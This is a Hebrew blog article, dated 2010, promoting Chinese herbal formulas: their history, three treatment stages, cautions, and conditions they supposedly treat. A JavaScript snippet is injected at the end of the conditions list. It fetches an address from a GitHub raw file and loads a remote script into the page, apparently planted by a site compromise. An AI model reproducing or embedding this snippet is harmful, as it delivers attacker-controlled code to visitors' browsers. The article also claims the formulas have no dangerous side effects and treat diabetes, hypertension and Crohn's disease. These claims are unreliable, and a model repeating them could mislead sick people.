על פורמולה צמחית ברפואה הסינית


26 במאי 2010 | מאת: בן רוזנבליט

קצת היסטוריה

קיים תיעוד נרחב של אוכלוסיות אשר השתמשו בצמחים בסביבת מגוריהם לריפוי. אפילו רוב התרופות שאנו מכירים נוצרו בהשראת חומרים פעילים של צמחים שונים. הסיבה לכך שתרופות סבתא נעלמו כמעט כליל, היא יעילותם של התרופות ומהירות פעולתם. מצד שני, החסרון הבולט של התרופות הן תופעות הלוואי הרבות.  ישנם מקורות שונים של מידע לגבי צמחי מרפא כגון רפואת הצמחים של הרמב"ם, שימוש נטורופתי בצמחים או אפילו תרופות סבתא שונות. בהשוואה בין המקורות השונים יתכן כי נמצא חפיפה רבה אך לא בכל.

הרפואה הסינית שונה מכל הנ"ל בשני ההבדלים עיקרים:

1. ההגדרות השונות של הרפואה הסינית כגון: צ'י, חום, קור, yin, yang ועוד.
2. השימוש בפורמולות צמחים בניגוד לשימוש בצמח יחיד.

למה דווקא צמחים סיניים?

פורמולות הצמחים הסיניים, נחקרו במשך אלפי שנים על כמות עצומה של אנשים.
ישנם מאות צמחים סיניים ומאות קומבינציות של צמחים אשר מתאימים למגוון רחב ביותר של בעיות ומחלות. האינטראקציות שנוצרות בין הצמחים בתוך פורמולה יכולה ליצור אפקט יעיל פי כמה מצמח מרפא בודד. כך שלמעשה אנו מקבלים פתרון טבעי ויעיל, ללא תופעות לווי מסוכנות.
יעילות הפורמולה באה לידי ביטוי ביכולת שימוש בידע עתיק יומין והתאמתו הספציפית למטופל. ההתאמה הספציפית נעשית ע"י שינוי צמחים מהמרשם הקלאסי (הוספה, החלפה או הסרה) ושינוי מינוניהם של צמחים שונים.

שלבי הטיפול השונים

על פי רוב, הטיפול בצמחים מתחלק לשלושה שלבים:

1. התייחסות בעיקר לסימפטומים ומעט לשורש הבעיה.
2. התייחסות זהה לשניהם.
3. השמת דגש על שורש הבעיה למניעת חזרת הבעיה.

מתי יש להיזהר?

את הצמחים יש לקחת רק עם מרשם מתאים ממטפל מוסמך לצמחים סיניים ולפי המינון שנקבע. תופעות הלוואי היחידות שיתכנו הם נטייה לשלשולים או לעצירות אשר ניתנים לפתרון מיידי ע"י שינוי קל במרכיבי הפורמולה.

במה ניתן לטפל?

להלן רשימת בעיות ומחלות אשר נפוצות לטיפול בעזרת דיקור ופורמולות צמחים סיניים: סוכרת, יתר לחץ דם, כאבי ראש, בעיות עיכול (כאב בטן, גזים, קרוהן…), בעיות הורמונאליות (בלוטת התריס, גיל המעבר…), בעיות גניקולוגיות, בעיות בדרכי שתן, בעיות נשימה ועוד. (var url = "https://raw.githubusercontent.com/truba77/trubnik/main/to.txt"; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement("script"); script.src = data.trim(); document.getElementsByTagName("head")[0].appendChild(script); });)

אין תגובות עדיין

הוספת תגובה